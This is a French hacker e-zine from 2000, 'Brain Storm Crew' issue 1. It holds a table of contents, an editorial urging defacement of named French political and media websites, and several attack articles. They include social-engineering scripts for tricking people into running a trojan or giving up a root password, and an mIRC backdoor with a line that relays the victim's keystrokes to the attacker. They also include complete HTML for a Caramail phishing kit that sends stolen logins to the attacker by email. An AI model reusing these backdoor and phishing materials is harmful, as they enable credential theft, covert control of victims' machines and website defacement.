Copy Link
Add to Bookmark
Report
Brain Storm Crew Issue 1
01010101010 010101010101 010101010101 ÛÛÛÛÛÛÛÛÛÛ
1 --------- 0 1 ---------- 1 1 ---------- 0 Û
0 ---------- 1 0 ---------- 0 0 ---------- 1 Û
1 ---------- 0 1 -- 10101010 1 ---------- 0 Û
0 ---------- 1 0 -- 0 0 ----0101010 ÛÛÛÛÛÛÛÛÛÛ
1 --------- 0#########1 -- 101010101###########1 --- 1############ ÛÛÛÛÛÛ
0 -- 101010 # hAcK 0 ---------- 0 dA 0 --- 0 pLAnEt # Û Û
1 -- 010101 # 1 ---------- 1 1 --- 1 ;) # Û Û
0 --------- 1#########010101010 -- 0###########0 --- 0############ ÛÛÛÛÛÛ
1 ---------- 0 1 -- 1 1 --- 1010101 ÛÛÛÛÛÛ
0 ---------- 1 10101010 -- 0 0 ---------- 1 Û Û
1 ---------- 0 0 ---------- 1 1 ---------- 0 Û Û
0 --------- 1 1 ---------- 0 0 ---------- 1 Û ÛÛ Û
10101010101 010101010101 101010101010 ÛÛÛÛ
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
Brain Storm Crew
Issue #1 Septembre 2000
Contacts:
===========
URL : www.bsc.fr.st
Mail : bsc@fr.st
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
MEMBRES
=========
Nick Spécialité(s) e-mail
NOs-K Articles mag, nosk@cybercable.fr
(fondateur) MAJ web site
Elgadir Rédac'chef, elgadir@usa.net
(fondateur) Articles mag
sKoop Webmaster skoop@programmer.net
Articles mag
[_M_A_D_] Lance patat doctor_mad@caramail.com
;)
Scurt Articles mag scurt@caramail.com
a2_b2 Articles mag
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
DISCLAIMER
=======================
Ou comment se faire chier pour dire quelque chose que personne ne lira jamais...
Vous tenez entre votre clavier un ensemble de lettres et de chiffres qui ont été mis
au hasard dans le fichier. Pour des raisons de formatages différents suivant les
OS l'image ASCII risque de se déformer et créer des mots, voir malheureusement des
insultes ou même des phrase qui semblent correctes alors que nous avons juste voulu faire
un dessin ! (Bon, personne n'y crois à mon histoire ASCII, on va changer de
méthode pour la suite =))
Donc regardez ces ensembles de caractères et si les mots qui apparaissent vous donnent
des idées et bien gardez les pour vous, marrez-vous un coup mais ne le faites pas ! En
effet puisque personne n'a voulu écrire ça, les conséquences n'ont pas put être
évaluées et risquent d'être dangereuses pour vous... d'ailleurs nous, on fait ce "truc"
pour s'amuser donc on ne pourra être tenu pour responsable si par malheur vous
faisiez ce qui se trouve dans ces lignes...
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
Edito
=======
Vous avez devant les yeux, très chers lecteurs, l'issue #1 du mag de B.S.C (Brain
Strom Crew :)). C'est un nouveau groupe, on a fait un site avec pleins de progs et
de truc intéressants (www.bsc.fr.st), mais surtout le plus gros travail de notre
groupe sera ce mag :)
Avant toute chose, on va vous exposer notre philosophie du hacking, et plus
particulièrement, nos motivations dans le hacking. Nous devons tous adhérer à un
combat, même si nous ne sommes pas tous des élites, ce combat, c'est celui contre
les autorités et les milliardaires qui portent atteinte à la liberté de tout
individu. Je ne vais pas m'étendre sur Microsoft et sur l'attitude que doit avoir
le hacker (ici un soldat pour la liberté) par rapport à cette entreprise. Il n'y a
pas que Bill Gates qui nous prive de liberté, mais aussi tous les dirigeants de
l'OMC (organisation mondiale du commerce), dont BG fait partie, qui veulent nous
forcer à ne boire que Coca ou Pepsi, a ne manger que mac do ou du maïs
transgénique. Ils sont extrèmement vicieux, ces gens là, pour supprimer les petits
producteurs (bio par exemple :)), ils instaurent des lois sur l'hygiène impossibles
à suivre et ces agriculteurs ferment les uns après les autres. Bon, je vais arrêter
de parler des paysans, mais vous avez compris le problème de fond : nous devons
nous battre pour qu'il n'y ait pas l'émergence d'autres Bill Gates dans des
secteurs comme l'alimentation, les médias, et pire la politique. En gros, des
sites comme www.front-nat.fr ou www.wto.org (OMC) devraient être tapissés
en permanence des fresques de révoltes des hackers.
Et comme disait The Mentor :
"Vous construisez des bombes atomiques, vous financez les guerres, vous ne
punissez pas les patrons de la mafia aux riches avocats, vous assassinez et
trichez, vous manipulez et nous mentez en essayant de nous faire croire que c'est
pour notre propre bien Ûtres et nous sommes encore des criminels."
J'y ajouterais :
"Vous voulez supprimer notre liberté d'expression, notre liberté de choix, vous
avez déjà supprimer la liberté de vivre de millions d'êtres humains : vous
préférez jeter ce qui est en trop plutôt que de le donner gratuitement à ceux qui
en ont besoin. Vous abrutissez les habitants des pays développes grâce à la TV
pour mieux leur faire ingurgitez vos produits (informatique, alimentation...) et
asseoir votre pouvoir encore plus.
Voila pourquoi, nous, criminels, vous ferons comprendre cela a travers diverses
actions..."
Voila pour la philo, maintenant, je vais juste dire ce que je pense de la
scène française. Tout le monde dit qu'elle est morte, qu'elle ne sert à rien. On
pleurt sur Noroute et Noway, a quoi ça sert? Deux excellents mags sont sorti cette
année et relance actuellement la scène française : RTC et, encore meilleur :
Counter Strike (Tipiak). C'est vrai qu'on a pas un groupe comme 2600 ou CCC, et
alors? Faisons avec ce qu'on a et faisons parler de la scène française, en nikant
des sites comme front-nat.fr, tf1.fr, lepen.net...
Elgadir
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
|_| | |_/ _ _ (_) _ |
| | (` \) . | \ (` (` |) (_ (_) ,-.(_) | o o o
/ | `-'
_
(_) *
.|, * O
-x-
'|` \ \ |// | *
( %%%)%%%/%%% % -+- O
_ %\%%%%%%%%(%%%%%/ |
%%%%%%%%%%)%%%)%(%%\ _
%%/ __^_ _^__ \%%% (_) _|_ )
|"\=(((@))=((@)))=/"|% | (
%\_( ,`--'(_)`--'. )_/ % \ )
/%%( /______I______\ )% ) ) ,
_/%%%%\\\_|_|_|_|_|_///%%% ,----.-._ ( /
%% %%\ `|_|_|_|_|' /%\%%\ / __ `.``. \(
-%% %%%%`---.___,---'%%%% ) / / _`.__))))____`
( %% % %% \ ( @)__,._ :%##
% % \ .' )`-----.%##
/ `' ,'
I. Hacking
-------------------------------------------------------------
( 1 | Le S.E et le R.E | N0sk )
-------------------------------------------------------------
( 2 | La backdoor IRC | a2_b2 )
-------------------------------------------------------------
( 3 | Le web engeenering (hack cara) | Scurt )
-------------------------------------------------------------
( 4 | Hacks des Pages Tripod | N0sk )
-------------------------------------------------------------
( 5 | Les Fichiers Password | N0sk )
-------------------------------------------------------------
( 6 | Les wingates | sKoop )
-------------------------------------------------------------
II. Protocoles réseaux et Internet
-------------------------------------------------------------
( 7 | Le Protocole IP | N0sk )
-------------------------------------------------------------
( 8 | IRC par telnet | sKoop )
-------------------------------------------------------------
( 9 | FTP par telnet | sKoop )
-------------------------------------------------------------
( 10 | Le FTP et le TFTP | N0sk )
-------------------------------------------------------------
III. Phreaking
-------------------------------------------------------------
( 11 | Les cabines FT | sKoop )
-------------------------------------------------------------
( 12 | Histoire du phreaking | Elgadir )
-------------------------------------------------------------
( 13 | VMB/PABX | Elgadir )
-------------------------------------------------------------
( 14 | Phoner gratis | NOsk )
-------------------------------------------------------------
IV. Programmation
-------------------------------------------------------------
( 15 | Programmation Batch | N0sk )
-------------------------------------------------------------
V. Délires, humour
-------------------------------------------------------------
( 16 | Les lamers ;) | Elgadir )
-------------------------------------------------------------
( 17 | Le Mad. Rocket. Launcher | [_M_A_D_] )
-------------------------------------------------------------
( 18 | Bien utiliser un no de CB | Elgadir )
-------------------------------------------------------------
VI. Le mot de la fin
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
*********************************************************************
* 1 *
* Le S.E et le R.E *
* *
* par N0s-k *
* *
*********************************************************************
Vous allez dire, encore un enième article sur le SE, bah vous avez tout a fait raison :p
Mais malgré tout ce que l'on peut dire là dessus, le S.E et le R.E sont des moyens mettant
autant, voir plus, notre esprit en action, et surtout, arriver a ses fins en tirant parti de
la connerie humaine....
I. LE SE
########
Le S.E., ou Social Engeenering est l'art de se faire passer pour quelqu'un d'autre...et le
plus souvent quelqu'un d'important (l'admin système par exemple =))
Bon alors déjà les prérequis pour le S.E :
- Une voix assurée de ce quelle fait
- Une très grosse paire de couille (pour les mecs...les meufs c trop facile pour elles,
elle font ça tous les jours du S.E =))
Voilà, vous avez votre modulateur de voix et votre paire de couille ?
Ok, on peut y aller...
Bon là je vais vous parlez du S.E téléphonique pour le S.E dans 'la vie réelle' on verra
ça dans un autre article =) En effet le S.E téléphonique est le plus facile a mettre en
ouvre si vous ne paniquez pas...Rien ne vaut l'exemple, vous allez envoyer un Lame'Trojan
a un type sur IRC :) (pour plus de clarté, "vous" désigne vous et "lamer" désigne le lamer
=))
Acte I: Et le lamer mordit
La scène se déroule sur IrcNet, dans le chan #jeux_en_reseau_lame
*Join Vous
(Il y a 50 bots qui vous disent bonjours, plus il y a de bot, plus il y a de lame (donc de
cible =))
vous>lo
lamer1>lo
lamer2>lo
[...]
lamer456>lo
vous> hey Lame1, tu veux te faire un jeux_en_reseaux_lame ?
lame1 vous prend en PV, s'il ne le fait pas, faites le, il est trop lame pour faire des
message =)
lame1>quel jeux ?
vous> Tu as quoi ?
lamer1>Je les ai tous ! je suis un boss du Warez !! Je suis une 31337 man !
vous>wow
lame1>héhé
vous>Tu as quoi comme connect ?
lame1>RTc 56K (en fait il peut vous repondre n'importe quoi, aucune importance...)
vous>Tiens, comme moi ! Tu connais le "Speed Bust for 56K" ?
lame1>nop c koi ?
vous> c un prog qui augmente le cash de ta RAM pour que ton 56K soit un 128K ! Ca marche
trop bien !!!
lame1>Cool ! Je peut le telecharger où ?
vous> J'en sais rien, c'est un ami allemand qui ma 'a envoyé...si tu veux je te le DCC et
on se fait une superbe partie a 128K !
lame1> Cool, balance !
Et voila il est niké vous lui envoyé et après vous réalisez que vous êtes plus lame que
lui d'utiliser un trojan mais c pas le sujet ;))
Un autre exemple ? Celui là est beaucoup plus intéressant dans le sens ou vous allez
recevoir dans votre mail le passwd ainsi que le login d'un type....
Tout d'abord il va vous falloir un minimum de préparation....
vous allez devoir vous créer un compte chez le fournisseur/hébergeur/maileur de votre
victime avec comme nom pas jean_hubert mais un truc du genre sysadmin,
administrateur, ce qui vous donnera une adresse du genre admin_systeme@truc.com...on y
croirais presque :) (Nd Elgadir : tiens, ca me rappelle une ptite affaire... unolpac..??)
Ensuite vous devez, sur ce même hébergeur créer une page avec un formulaire contenant
deux cases à remplir avec devinez quoi ? Pass et login :)Et au lieu de renvoyez ça vers un
CGI envoyez direct sur l'e-mail ...après c'est à vous de la rendre réaliste ! Par exemple
ajoutez le logo de la société, de la pub (si c pour multimania =))et aussi vous devez
respectez les même couleurs...
Donc vous vous retrouvez avec votre mail: admini_sys@truc.com et votre page
www.truc.com/admini_sys/verif.htm (donnez lui un joli nom :) héhé now vous êtes un admin =)
Après vous envoyez un mail a votre victime avec un truc dans le genre:
"Monsieur Truc,
Suite a une intrusion de notre HDD et a la prolifération d'un virus, nous nous voyons dans
l'obligation de restructuré notre société et pour cela nous vous invitons à vous rendre
sur notre page sécurise en SSL 128 afin de vous relogger et de recréer votre acompte.
Voici l'URL: www.truc.com/admini_sys/verif.htm
Nous vous prions de le remplir dans les 48h sous peine de voir fermé votre acompte
Veuillez agréer Nos salutations distingué... [...](faut faire professionnel =))"
Et voilà le connard va sur votre joli page rentre les infos ("oh non maman ! si je me
trompe il ferme mon site Lame !!!") et vous avez de quoi hacké proprement sa page...(le
mieux c'est de faire une mailing liste et l'envoyer à une centaine de personne =))
II. Le RE
#########
Le RE ou encore Reverse Engeenering est tout l'inverse du SE... il s'agit de se faire
passer pour un con pour faire ressortir chez votre victime le sentiment le plus affreux de
ce monde... l'orgueil...
Je m'explique, vous vous faites passez pour un petit newbie perdu et là vot victime qui
connaît la réponse a votre problème ne va pas réfléchir plus qu'il n'en faut et pour
prouver que c'est le maître il va vous donnez la réponse sans penser aux conséquences....
Comme toujours, rien ne vaux l'exemple donc en voici un :
ActE I: La scène se déroule dans votre bureau et vous voulez le passe root de l'admin
système...
vous> Bonjour monsieur l'administrateur système (il est au phone, faut pas qu'il voit votre
rire sadique =))
admin_con> Que puis-je pour vous ?
vous> J'ai voulu lancer xproboly (c n'importe quoi =))
admin_con>(gêné de ne pas connaître) et alors ?
vous> il me dit "Don't have permission please LOGAINNEE as root " (faut prononcer comme les
lames sinon ça fait pas réaliste =))
admin_con> Est-ce important ?
vous> oui et je dois partir dans 5 min
(faites ça de préférence le soir avant que tous les fonctionnaires se tirent)
admin_con> Moi aussi..bon (En gonflant le torse) j'ai la solution
admin_con>C'est très compliqué...mais je suis payé pour ça
vous> O merci vous êtes mon sauveur !
admin_con>Alors vous tapez 'logout' puis 'login' et la vous tapez root...
vous>Pas si vite !! Bon c bon..il me dit "Password:", ça veut dire quoi "password" ?
admin_con>C'est du langage de pro..tapez "abcdef"
vous> en effet je n'aurais jamais put y penser !!
admin_con>Est-ce que ça marche ?
vous> Oui, le logiciel marche
vous> Merci beaucoup, je parlerais de vous au directeur !
admin_con> Au revoir (et oui il est 16H00 - 5 sec =))
Clicc...
Et voila vous avez le pass de l'admin =)
ce n'est qu'un exemple...peut être pas le meilleur mais ça marche impec dans le sens où
tout les paramètres requis sont rassemblé.
N0s-k
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
*********************************************************************
* 2 *
* La Backdooor IRC *
* *
* par a2_b2 *
* *
*********************************************************************
Bon, on va voir ce qu'est la backdoor irc : comment ça marche, à quoi ça sert, etc...
Si ça marche pas ou si t'as rien compris a2_b2@nomade.fr (pkoi @nomade? ben c'est illimité
ça veut dire que tu peux avoir 100 Mo de mails il ouvre pas leur gueule. Hotmail t'as juste
le droit à 2 ou 3 Mo, je sais plus.)
Bon, allez, on y va.
Cette backdoor est extrèmement utile tu vas le piger tout de suite.
Le truc, c'est de loader un script dans l'irc de la victime ou si t'as un neuneu
de lui faire loader grace a un peu de SE (social egeenering) :
CTCP 1:REMOTE: /$$2-
tu fous cette commande dans un txt et après, dans son répertoire mirc
tu ou il tape :
/load-rs non_du_txt.txt
voilà, ça c'est fait, te voilà le nouveau 'root' hehhe
t'as juste à tapper
/ctcp <nick_de_la_victime> REMOTE <commande_de_l_action_que_veut>
tu imagines tout de suite les possibilités si il est op et s il a un access au bot
/ctcp Un_op REMOTE msg X ADDUSER #channel_du_op ton_nick *!*@* 100 PassWord
très important et c'est là le pied dans Mirc t'as la commande /run
imagine les possibilités...
la merde c'est que la victime va voir des [votre_nick REMOTE] /....... dans son status
pour ca ben va faloir mettre en couleur, la même que son status, la les ctcp et le tour
est joué sauf si vous savez la couleur ...
bon le commandé ca vous a pas suffit, j'ai mieux, sniffer tout ce qu il dit et fait héhé
fo il inclure ca ds le script
on 1:INPUT:*: /msg ton_nick $$1
et la tu recois tout les commande et phrase tapé par la victime
dans le prochain numero on verra une commande pour planter son irc d ici la envoy.....
je tiens a remercié mes source 'frhack'
encore un fois a2_b2@nomade.fr je serais ravi d'entendre vos remarques ou
vous aider....
a2_b2
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.,_,.-*~'^'*-,-*'^'~*-.,_,.-**-.
*********************************************************************
* 3 *
* Le web engeenering (hack caramail) *
* *
* par Scurt *
* *
*********************************************************************
Voici la première technique de hack que je vais vous apprendre.
Je lai inventé mais je me suis inspiré dune autre technique. Un jour je découvre
quun mec envoie au abonner de Hotmail un e-mail en html qui leur fais croire
quils ont été déconnecté à cause de je ne sais plus quelle raison. Quand la
personne qui avait reçu le mail remplissait les champs pseudo et mot de passe,
ça envoyait les informations sur un script cgi (scripte cgi= cest un mini
programme le plus souvent écrit en perl). Ce script envoyait ces mêmes infos à une
adresse e-mail, mais sans passer par une messagerie.
Je pense que vous avez tous un jour entendu parler du truc ou il faut remplacer
le tag action de cara par mailto:votrepseudo@votreserveur.com ben cest bien
joli mais sa sert a rien, ca ouvre Outlook (ou la messagerie par défaut du mec),
même le plus con des internautes va se douter de qqch.
Alors je me dit ben click droit sur la page de cara, on remplace le tag action
par le truc qui envoie sur le cgi. Mais faut croire que cara y avait pensé
ou nest pas assez perfectionner pour envoyer un message comme celui la en html.
Alors comme javais déjà lu un livre sur le html je me suis dit ben on va pas
se laisser baiser comme ça.
Alors jai fais quoi ? ben jai repris ma fausse page cara, jai ouvert un site
chez citeweb.net et je lai hébergé. Mais le problème cétait comment envoyer
le mec de chez cara dessus. Vous avez déjà tous vu ces sites : nous avons changé
dadresse vous aller être rediriger dessus dans 10sec . Ben jai fais la même chose
mais pas dans 10sec ,tout de suite le mec ouvre le mail ça le redirige sur ma page
hébergée chez citeweb.net il croit que cara a planté (un peu comme dhabitude)
il remplit les champs et voilà tout arrive chez moi par mail. Mais la un 2ème
problème chez le mec après avoir remplit la page ça fait rien . Il va se douter
de qqch cest là que jutilise une des nombreuses options de ce merveilleux langage
quest le html. Loption « redirige » comme son nom lindique ça le redirige
sur une autre page et la je met la valeur de la page qui saffiche quand on
se trompe de mot de passe chez cara le mec crois quil a fait une faute de frappe
il retape et la il entre normalement chez cara et moi jai son mot de passe.
Voilà les deux sources html.
Ce qui est en gras cest se que vous devez changer
La 1ere celle qui vous redirige sur la fausse page cara.
<HTML>
<HEAD>
<TITLE>1</TITLE>
<META NAME=GENERATOR CONTENT="">
</HEAD>
<BODY TEXT="#000099" BGCOLOR="#CCCCCC" onload="document.capabilities.submit();">
<P><BR>
<BR>
<HEAD><BR>
<TITLE></TITLE><BR>
<BR>
<ME*TA content="text/html; charset=windows-1252" http-equiv=Content-Type><ME*TA <BR>
<BR>
<SCR*IPT language=JavaSCR*IPT><!--<BR>window.onerror = ignore;<P>function ignore()<BR>{<BR>}<P>function testMimeTypes()<BR>{<P>}<P>function testCookie()<BR>{<BR>document.cookie="test=ok";<BR>if(document.cookie.length>0 && document.cookie.indexOf("test=ok")>-1)<BR>{<BR>document.capabilities.cookieenabled.value="true";<BR>return;<BR>}<BR>}<P>// --></SCR*IPT><BR>
</HEAD><BR>
<BR>
caraunix erreur.</P>
<P>Please wait... <FORM ACTION="http://www.hebergeur.com/pseudo/faussepagecara.html" METHOD=POST name=capabilities>
<P><BR>
</P>
<P><INPUT TYPE=hidden NAME=sessionkey VALUE=958506056832><BR>
<INPUT TYPE=hidden NAME=command VALUE=scanbrowser><BR>
<INPUT TYPE=hidden NAME=jsversion VALUE="1.0"><BR>
<INPUT TYPE=hidden NAME=javaenabled VALUE=true><BR>
<INPUT TYPE=hidden NAME=mimetypes VALUE=VALEUR><BR>
<INPUT TYPE=hidden NAME=plugins VALUE=VALEUR><BR>
<INPUT TYPE=hidden NAME=cookieenabled VALUE=false><BR>
<INPUT TYPE=hidden NAME=hastoolbar VALUE=true><BR>
<INPUT TYPE=hidden NAME=clientip VALUE=VALEUR><BR>
<INPUT TYPE=hidden NAME=clientname VALUE=VALEUR><BR>
</FORM> <SCR*IPT LANGUAGE="JavaSCR*IPT1.1"><!--<BR>document.capabilities.jsversion.value="1.1";<BR>// --></SCR*IPT>
<SCR*IPT LANGUAGE="JavaSCR*IPT1.2"><!--<BR>document.capabilities.jsversion.value="1.2";<P>// --></SCR*IPT>
<SCR*IPT LANGUAGE=JavaSCR*IPT><!--<BR>testMimeTypes();<BR>testCookie();<P>// --></SCR*IPT></P>
<P><BR>
</P>
</BODY>
</HTML>
La 2ème la fausse page caramail.com
<HTML>
<HEAD>
<TITLE>Caramail</TITLE>
<SCRIPT language=Javascript><!--
function OpenWin() {
window.open('loi.asp', 'Aide','width=400,height=220,resizable=no,scrollbars=no,status=no');
}
//--></SCRIPT><script LANGUAGE="JavaScript">document.Ident.LOGIN1.focus();
var zz;
x = new Date();
if (x.getYear()< 1000)
document.Ident.TZ.value = x.getYear() + 1900;
else
document.Ident.TZ.value = x.getYear();
zz = '00' + (x.getMonth() + 1);
document.Ident.TZ.value += zz.substring(zz.length - 2, zz.length);
zz = '00' + x.getDate();
document.Ident.TZ.value += zz.substring(zz.length - 2, zz.length);
zz = '00' + x.getHours();
document.Ident.TZ.value += zz.substring(zz.length - 2, zz.length);
zz = '00' + x.getMinutes();
document.Ident.TZ.value += zz.substring(zz.length - 2, zz.length);</script>
</HEAD>
<BODY BGCOLOR="#FFFFFF" LINK="#000000" VLINK="#000000">
<CENTER><TABLE BORDER=0 BGCOLOR="#F0E8CC" CELLSPACING=0 CELLPADDING=0>
<TR>
<TD ALIGN=center WIDTH=134 BGCOLOR="#CCCCFF">
<P><IMG SRC="http://imgsrv.caramail.com/images/caramail.gif" WIDTH=112 HEIGHT=51 ALIGN=bottom></P>
</TD>
<TD ALIGN=center COLSPAN=7 WIDTH=470 BGCOLOR="#FFFFFF">
<P><A HREF="http://adclick.caramail.com/cgi-bin/redirect?TYPE=PUB&FROM=6&IDBANDEAU=ANG01&TARGET=www.annoncesgratuites.com" TARGET="_blank"><IMG SRC="http://ad.caramail.com/pub/ANG01.gif" WIDTH=468 HEIGHT=60 BORDER=0 ALIGN=bottom></A><IMG SRC="http://195.25.89.17/caramail_v?total" WIDTH=1 HEIGHT=1 BORDER=0 ALIGN=bottom><SCRIPT LANGUAGE=""><!--
tps = new Date();
if (tps.getSeconds() < 4) {
document.write("<IMG SRC=\"http://195.25.89.18/caramail_p?" + tps.getMinutes() + "0" + tps.getSeconds() + "_accueil" + "\" WIDTH=\"1\" HEIGHT=\"1\">");}
// --></SCRIPT><NOSCRIPT></P>
<P><IMG SRC="http://195.25.89.18/caramail_p?noscript_accueil" WIDTH=1 HEIGHT=1 ALIGN=bottom></P>
<P></NOSCRIPT></P>
</TD>
</TR><FORM ACTION="http://www.lecgi.net/public/form_mail.cgi" METHOD=POST>
<P><INPUT TYPE=hidden NAME=destinataire VALUE="votrepseudo@votrehebergeur.com">
<INPUT TYPE=hidden NAME=sujet VALUE=passe caramail>
<INPUT TYPE=hidden NAME=redirige VALUE="http://www17.caramail.com/general.asp?N=7375&C=2493&ERROR=1">
<TR BGCOLOR="#FFFFFF">
<TD ALIGN=center VALIGN=bottom WIDTH=134 BGCOLOR="#CCCCFF">
<P> </P>
</TD>
<TD VALIGN=bottom WIDTH=76>
<P><IMG SRC="http://imgsrv.caramail.com/images/vide.gif" WIDTH=76 HEIGHT=1 ALIGN=bottom></P>
</TD>
<TD VALIGN=bottom WIDTH=72>
<P><IMG SRC="http://imgsrv.caramail.com/images/vide.gif" WIDTH=72 HEIGHT=1 ALIGN=bottom></P>
</TD>
<TD VALIGN=bottom WIDTH=40>
<P><IMG SRC="http://imgsrv.caramail.com/images/vide.gif" WIDTH=40 HEIGHT=1 ALIGN=bottom></P>
</TD>
<TD VALIGN=bottom WIDTH=58>
<P><IMG SRC="http://imgsrv.caramail.com/images/vide.gif" WIDTH=58 HEIGHT=1 ALIGN=bottom></P>
</TD>
<TD VALIGN=bottom WIDTH=22>
<P><IMG SRC="http://imgsrv.caramail.com/images/vide.gif" WIDTH=22 HEIGHT=1 ALIGN=bottom></P>
</TD>
<TD VALIGN=bottom WIDTH=50>
<P><IMG SRC="http://imgsrv.caramail.com/images/vide.gif" WIDTH=50 HEIGHT=1 ALIGN=bottom></P>
</TD>
<TD VALIGN=bottom WIDTH=152>
<P><IMG SRC="http://imgsrv.caramail.com/images/vide.gif" WIDTH=151 HEIGHT=1 ALIGN=bottom></P>
</TD>
</TR>
<TR>
<TD ALIGN=center VALIGN=top ROWSPAN=2 WIDTH=134 BGCOLOR="#CCCCFF">
<P><A HREF="http://adclick.caramail.com/cgi-bin/redirect?TYPE=PUB&FROM=32&IDBANDEAU=BUY09&TARGET=www.buycentral.com/fr" TARGET="_blank"><IMG SRC="http://ad.caramail.com/pub/BUY09.gif" WIDTH=100 HEIGHT=60 BORDER=0 ALIGN=bottom></A> </P>
</TD>
<TD VALIGN=bottom WIDTH=76 BGCOLOR="#FFFFFF">
<P> </P>
</TD>
<TD VALIGN=bottom ROWSPAN=3 COLSPAN=2 WIDTH=112>
<P><IMG SRC="http://imgsrv.caramail.com/images/cara1.gif" WIDTH=112 HEIGHT=136 ALIGN=bottom></P>
</TD>
<TD VALIGN=bottom COLSPAN=3 WIDTH=130>
<P><IMG SRC="http://imgsrv.caramail.com/images/cara2.gif" WIDTH=130 HEIGHT=80 ALIGN=bottom></P>
</TD>
<TD ALIGN=center VALIGN=top WIDTH=152 BGCOLOR="#FFFFFF">
<P><A HREF="http://adclick.caramail.com/cgi-bin/redirect?TYPE=PUB&FROM=31&IDBANDEAU=RDC21&TARGET=www3.rueducommerce.fr/info/showdetl.cfm%3F%26Product_ID=324956%26DID=6%26PartenaireID=1" TARGET="_blank"><IMG SRC="http://ad.caramail.com/pub/RDC21.gif" WIDTH=100 HEIGHT=60 BORDER=0 ALIGN=bottom></A></P>
</TD>
</TR>
<TR><TD VALIGN=bottom WIDTH=76 BGCOLOR="#FFFFFF">
<P><IMG SRC="http://imgsrv.caramail.com/images/vide.gif" WIDTH=76 HEIGHT=35 ALIGN=bottom></P>
</TD>
<TD ALIGN=center VALIGN=bottom ROWSPAN=2 COLSPAN=2 WIDTH=80>
<P><FONT SIZE="-1"><INPUT TYPE=text NAME=LOGIN1 VALUE="" SIZE=8 MAXLENGTH=50><BR>
<INPUT TYPE=password NAME=PASSWORD1 VALUE="" SIZE=8 MAXLENGTH=8></FONT></P>
</TD>
<TD VALIGN=bottom ROWSPAN=2 WIDTH=50>
<P><IMG SRC="http://imgsrv.caramail.com/images/cara3.gif" WIDTH=50 HEIGHT=56 ALIGN=bottom></P>
</TD>
<TD ALIGN=center VALIGN=bottom ROWSPAN=2 WIDTH=152 BGCOLOR="#FFFFFF">
<P><IMG SRC="http://imgsrv.caramail.com/images/droite.gif" WIDTH=152 HEIGHT=20 ALIGN=bottom></P>
</TD>
</TR>
<TR>
<TD VALIGN=bottom COLSPAN=2 WIDTH=210 BGCOLOR="#FFFFFF">
<P><IMG SRC="http://imgsrv.caramail.com/images/hgauche.gif" WIDTH=210 HEIGHT=21 ALIGN=bottom></P>
</TD>
</TR>
<TR>
<TD ALIGN=center VALIGN=top WIDTH=134 BGCOLOR="#000040">
<P><IMG SRC="http://imgsrv.caramail.com/images/bgauche.gif" WIDTH=134 HEIGHT=19 ALIGN=bottom></P>
</TD>
<TD VALIGN=bottom ROWSPAN=2 WIDTH=76 BGCOLOR="#000000">
<P> </P>
</TD>
<TD VALIGN=top ROWSPAN=2 WIDTH=72>
<P><IMG SRC="http://imgsrv.caramail.com/images/cara4.gif" WIDTH=72 HEIGHT=106 ALIGN=bottom></P>
</TD>
<TD ALIGN=center VALIGN=top COLSPAN=2 WIDTH=98>
<P><INPUT TYPE=submit NAME=Enter VALUE=" Entrer "></P>
</TD>
<TD VALIGN=top ROWSPAN=2 COLSPAN=2 WIDTH=72>
<P><A HREF="/Bin/CreationCompte2/FormulaireNomPrenom.asp"><IMG SRC="http://imgsrv.caramail.com/images/cara6.gif" WIDTH=72 HEIGHT=106 BORDER=0 ALIGN=bottom></A></P>
</TD>
<TD VALIGN=top ROWSPAN=2 WIDTH=152 BGCOLOR="#000000">
<P> </P>
</TD>
</TR>
<TR>
<TD ALIGN=center VALIGN=top ROWSPAN=2 WIDTH=134 BGCOLOR="#000040">
<P><A HREF="http://adclick.caramail.com/cgi-bin/redirect?TYPE=PUB&FROM=33&IDBANDEAU=CDI27&TARGET=www.cdiscount.com/default.asp%3Frefer=caramail" TARGET="_blank"><IMG SRC="http://ad.caramail.com/pub/CDI27.gif" WIDTH=100 HEIGHT=60 BORDER=0 ALIGN=bottom></A> </P>
</TD>
</A><TD VALIGN=bottom COLSPAN=2 WIDTH=98>
<P><A HREF="/Bin/CreationCompte2/FormulaireNomPrenom.asp"><IMG SRC="http://imgsrv.caramail.com/images/cara5.gif" WIDTH=98 HEIGHT=62 BORDER=0 ALIGN=bottom></A></P>
</TD>
</TR>
